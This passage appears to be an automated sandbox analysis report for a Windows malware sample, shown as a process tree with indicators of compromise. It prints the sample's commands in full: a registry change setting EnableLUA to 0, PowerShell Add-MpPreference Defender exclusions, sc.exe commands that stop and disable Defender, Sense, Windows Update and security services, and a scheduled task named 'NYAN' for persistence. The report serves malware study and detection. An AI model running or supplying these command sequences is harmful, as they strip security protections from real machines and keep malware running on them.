4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe 132 PID 868 wrote to memory of 6088 868 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe 132 PID 2320 wrote to memory of 5432 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 134 PID 2320 wrote to memory of 5432 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 134 PID 2320 wrote to memory of 5432 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 134 PID 2320 wrote to memory of 5432 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 134 PID 2320 wrote to memory of 5432 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 134 -
System policy modification 1 TTPs 5 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" EdgeBrowser.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" EdgeBrowser.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 796ed4b0db9b3d50149b39c35c97fb22.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" EdgeBrowser.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"1⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Windows security bypass
- Checks computer location settings
- Drops startup file
- Windows security modification
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2320 -
C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5100 -
C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe" /SpecialRun 4101d8 51003⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2756
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2896
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1376
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4440
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe" -Force2⤵PID:3616
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1080
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe"2⤵
- UAC bypass
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:868 -
C:\Users\Admin\AppData\Local\Temp\3a8d1037-c218-4468-b049-38d039afce41\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\3a8d1037-c218-4468-b049-38d039afce41\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\3a8d1037-c218-4468-b049-38d039afce41\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1004 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\3a8d1037-c218-4468-b049-38d039afce41\test.bat"4⤵
- Suspicious use of WriteProcessMemory
PID:4984 -
C:\Windows\system32\sc.exesc stop windefend5⤵
- Launches sc.exe
PID:5452
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe" -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5844
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe" -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5884
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5928
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe" -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5996
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6088
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 13⤵PID:5808
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- Delays execution with timeout.exe
PID:5752
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe"3⤵
- Executes dropped EXE
PID:3324 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Delete /tn NYAN /F4⤵PID:2852
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn NYAN /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe" /sc minute /mo 14⤵
- Creates scheduled task(s)
PID:5460
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 868 -s 18523⤵
- Program crash
PID:5488
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1360
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:320
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:552
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 12⤵
- Suspicious use of WriteProcessMemory
PID:2404 -
C:\Windows\SysWOW64\timeout.exetimeout 13⤵
- Delays execution with timeout.exe
PID:5748
-
-
-
C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"2⤵
- Checks computer location settings
- Drops file in Windows directory
PID:5432 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Delete /tn NYAN /F3⤵PID:5464
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn NYAN /tr "C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe" /sc minute /mo 13⤵
- Creates scheduled task(s)
PID:5864
-
-
C:\Windows\EdgeBrowser.exe"C:\Windows\EdgeBrowser.exe"3⤵
- UAC bypass
- Windows security bypass
- Checks computer location settings
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:3864 -
C:\Users\Admin\AppData\Local\Temp\e8a9de02-0594-4d3e-9afc-2e8d01ca4dd4\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\e8a9de02-0594-4d3e-9afc-2e8d01ca4dd4\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\e8a9de02-0594-4d3e-9afc-2e8d01ca4dd4\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4676
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\EdgeBrowser.exe" -Force4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1580
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\EdgeBrowser.exe" -Force4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3456
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2508
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\EdgeBrowser.exe" -Force4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4316
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1240
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 14⤵PID:6060
-
C:\Windows\SysWOW64\timeout.exetimeout 15⤵
- Delays execution with timeout.exe
PID:5752
-
-
-
C:\Windows\EdgeBrowser.exe"C:\Windows\EdgeBrowser.exe"4⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:3460 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Delete /tn NYAN /F5⤵PID:5632
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn NYAN /tr "C:\Windows\EdgeBrowser.exe" /sc minute /mo 15⤵
- Creates scheduled task(s)
PID:2972
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3864 -s 17564⤵
- Program crash
PID:1436
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2320 -s 17562⤵
- Program crash
PID:5836
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2320 -ip 23201⤵PID:1868
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 868 -ip 8681⤵PID:440
-
C:\Windows\system32\sc.exesc stop windefend1⤵
- Launches sc.exe
PID:884
-
C:\Windows\system32\sc.exesc config SecurityHealthService start= disabled1⤵
- Launches sc.exe
PID:5804
-
C:\Windows\system32\sc.exesc stop WdiSystemHost1⤵
- Launches sc.exe
PID:1500
-
C:\Windows\system32\sc.exesc config InstallService Start= disabled1⤵
- Launches sc.exe
PID:4160
-
C:\Windows\system32\sc.exesc stop InstallService1⤵
- Launches sc.exe
PID:2268
-
C:\Windows\system32\sc.exesc config WdiSystemHost start= disabled1⤵
- Launches sc.exe
PID:1800
-
C:\Windows\system32\sc.exesc config WdiServiceHost start= disabled1⤵
- Launches sc.exe
PID:928
-
C:\Windows\system32\sc.exesc stop WdiServiceHost1⤵
- Launches sc.exe
PID:4736
-
C:\Windows\system32\sc.exesc config wscsvc start= disabled1⤵
- Launches sc.exe
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3616
-
C:\Windows\system32\sc.exesc stop wscsvc1⤵
- Launches sc.exe
PID:2324
-
C:\Windows\system32\sc.exesc config SDRSVC start= disabled1⤵
- Launches sc.exe
PID:3816
-
C:\Windows\system32\sc.exesc stop SDRSVC1⤵
- Launches sc.exe
PID:3688
-
C:\Windows\system32\sc.exesc stop SecurityHealthService1⤵
- Launches sc.exe
PID:4484
-
C:\Windows\system32\sc.exesc config WaasMedicSvc start= disabled1⤵
- Launches sc.exe
PID:3508
-
C:\Windows\system32\sc.exesc stop WaasMedicSvc1⤵
- Launches sc.exe
PID:3860
-
C:\Windows\system32\sc.exesc config usosvc start= disabled1⤵
- Launches sc.exe
PID:704
-
C:\Windows\system32\sc.exesc stop usosvc1⤵
- Launches sc.exe
PID:3364
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled1⤵
- Launches sc.exe
PID:3764
-
C:\Windows\system32\sc.exesc stop wuauserv1⤵
- Launches sc.exe
PID:3652
-
C:\Windows\system32\sc.exesc config Sense start= disabled1⤵
- Launches sc.exe
PID:1760
-
C:\Windows\system32\sc.exesc stop Sense1⤵
- Launches sc.exe
PID:4692
-
C:\Windows\system32\sc.exesc config windefend start= disabled1⤵
- Launches sc.exe
PID:2156
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e8a9de02-0594-4d3e-9afc-2e8d01ca4dd4\test.bat"1⤵PID:5960
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv M0nPrqn9l0uxnPFE5ym+WA.0.21⤵PID:5808
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3864 -ip 38641⤵PID:4996
-
C:\Windows\EdgeBrowser.exeC:\Windows\EdgeBrowser.exe1⤵
- UAC bypass
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:3652 -
C:\Users\Admin\AppData\Local\Temp\008d5608-fb82-4b14-a4f4-16aeb5d00930\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\008d5608-fb82-4b14-a4f4-16aeb5d00930\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\008d5608-fb82-4b14-a4f4-16aeb5d00930\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2716 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\008d5608-fb82-4b14-a4f4-16aeb5d00930\test.bat"3⤵PID:4484
-
C:\Windows\system32\sc.exesc stop windefend4⤵
- Launches sc.exe
PID:3196
-
-
C:\Windows\system32\sc.exesc config windefend start= disabled4⤵
- Launches sc.exe
PID:1912
-
-
C:\Windows\system32\sc.exesc stop Sense4⤵
- Launches sc.exe
PID:2944
-
-
C:\Windows\system32\sc.exesc config Sense start= disabled4⤵PID:4736
-
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
PID:6052
-
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled4⤵
- Launches sc.exe
PID:4660
-
-
C:\Windows\system32\sc.exesc stop usosvc4⤵
- Launches sc.exe
PID:4000
-
-
C:\Windows\system32\sc.exesc config usosvc start= disabled4⤵
- Launches sc.exe
PID:4752
-
-
C:\Windows\system32\sc.exesc stop WaasMedicSvc4⤵
- Launches sc.exe
PID:2268
-
-
C:\Windows\system32\sc.exesc config WaasMedicSvc start= disabled4⤵
- Launches sc.exe
PID:4884
-
-
C:\Windows\system32\sc.exesc stop SecurityHealthService4⤵
- Launches sc.exe
PID:3744
-
-
C:\Windows\system32\sc.exesc config SecurityHealthService start= disabled4⤵
- Launches sc.exe
PID:4160
-
-
C:\Windows\system32\sc.exesc stop SDRSVC4⤵
- Launches sc.exe
PID:4424
-
-
C:\Windows\system32\sc.exesc config SDRSVC start= disabled4⤵
- Launches sc.exe
PID:2428
-
-
C:\Windows\system32\sc.exesc stop wscsvc4⤵
- Launches sc.exe
PID:3108
-
-
C:\Windows\system32\sc.exesc config wscsvc start= disabled4⤵
- Launches sc.exe
PID:5960
-
-
C:\Windows\system32\sc.exesc stop WdiServiceHost4⤵
- Launches sc.exe
PID:5316
-
-
C:\Windows\system32\sc.exesc config WdiServiceHost start= disabled4⤵
- Launches sc.exe
PID:4448
-
-
C:\Windows\system32\sc.exesc stop WdiSystemHost4⤵
- Launches sc.exe
PID:2804
-
-
C:\Windows\system32\sc.exesc config WdiSystemHost start= disabled4⤵
- Launches sc.exe
PID:4896
-
-
C:\Windows\system32\sc.exesc stop InstallService4⤵
- Launches sc.exe
PID:1752
-
-
C:\Windows\system32\sc.exesc config InstallService Start= disabled4⤵
- Launches sc.exe
PID:1212
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\EdgeBrowser.exe" -Force2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5212
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\EdgeBrowser.exe" -Force2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5572
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3016
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\EdgeBrowser.exe" -Force2⤵
- Suspicious use of AdjustPrivilegeToken
PID:6072
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4972
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 12⤵PID:6000
-
C:\Windows\SysWOW64\timeout.exetimeout 13⤵
- Delays execution with timeout.exe
PID:2128
-
-
-
C:\Windows\EdgeBrowser.exe"C:\Windows\EdgeBrowser.exe"2⤵
- Executes dropped EXE
PID:2776
-
-
C:\Windows\EdgeBrowser.exe"C:\Windows\EdgeBrowser.exe"2⤵
- Executes dropped EXE
PID:2896 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Delete /tn NYAN /F3⤵PID:5244
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn NYAN /tr "C:\Windows\EdgeBrowser.exe" /sc minute /mo 13⤵
- Creates scheduled task(s)
PID:812
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3652 -s 9082⤵
- Program crash
PID:5428
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3652 -ip 36521⤵PID:380
-
C:\Windows\EdgeBrowser.exeC:\Windows\EdgeBrowser.exe1⤵
- UAC bypass
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System policy modification
PID:4380 -
C:\Users\Admin\AppData\Local\Temp\2841dd81-cf01-489d-83c7-652a0936f2d0\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\2841dd81-cf01-489d-83c7-652a0936f2d0\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\2841dd81-cf01-489d-83c7-652a0936f2d0\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1376 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2841dd81-cf01-489d-83c7-652a0936f2d0\test.bat"3⤵PID:3848
-
C:\Windows\system32\sc.exesc stop windefend4⤵
- Launches sc.exe
PID:3196
-
-
C:\Windows\system32\sc.exesc config windefend start= disabled4⤵
- Launches sc.exe
PID:2148
-
-
C:\Windows\system32\sc.exesc stop Sense4⤵
- Launches sc.exe
PID:1424
-
-
C:\Windows\system32\sc.exesc config Sense start= disabled4⤵
- Launches sc.exe
PID:6052
-
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
PID:4660
-
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled4⤵
- Launches sc.exe
PID:3712
-
-
C:\Windows\system32\sc.exesc stop usosvc4⤵
- Launches sc.exe
PID:756
-
-
C:\Windows\system32\sc.exesc config usosvc start= disabled4⤵
- Launches sc.exe
PID:3408
-
-
C:\Windows\system32\sc.exesc stop WaasMedicSvc4⤵
- Launches sc.exe
PID:4884
-
-
C:\Windows\system32\sc.exesc config WaasMedicSvc start= disabled4⤵
- Launches sc.exe
PID:3744
-
-
C:\Windows\system32\sc.exesc stop SecurityHealthService4⤵
- Launches sc.exe
PID:4160
-
-
C:\Windows\system32\sc.exesc config SecurityHealthService start= disabled4⤵
- Launches sc.exe
PID:4424
-
-
C:\Windows\system32\sc.exesc stop SDRSVC4⤵
- Launches sc.exe
PID:2428
-
-
C:\Windows\system32\sc.exesc config SDRSVC start= disabled4⤵
- Launches sc.exe
PID:5304
-
-
C:\Windows\system32\sc.exesc stop wscsvc4⤵PID:3060
-
-
C:\Windows\system32\sc.exesc config wscsvc start= disabled4⤵
- Launches sc.exe
PID:4796
-
-
C:\Windows\system32\sc.exesc stop WdiServiceHost4⤵PID:4492
-
-
C:\Windows\system32\sc.exesc config WdiServiceHost start= disabled4⤵
- Launches sc.exe
PID:564
-
-
C:\Windows\system32\sc.exesc stop WdiSystemHost4⤵
- Launches sc.exe
PID:3512
-
-
C:\Windows\system32\sc.exesc config WdiSystemHost start= disabled4⤵
- Launches sc.exe
PID:1660
-
-
C:\Windows\system32\sc.exesc stop InstallService4⤵
- Launches sc.exe
PID:1212
-
-
C:\Windows\system32\sc.exesc config InstallService Start= disabled4⤵
- Launches sc.exe
PID:1364
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\EdgeBrowser.exe" -Force2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5300
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\EdgeBrowser.exe" -Force2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5408
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1504
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\EdgeBrowser.exe" -Force2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5700
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force2⤵PID:5536
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 12⤵PID:2376
-
C:\Windows\SysWOW64\timeout.exetimeout 13⤵
- Delays execution with timeout.exe
PID:3324
-
-
-
C:\Windows\EdgeBrowser.exe"C:\Windows\EdgeBrowser.exe"2⤵
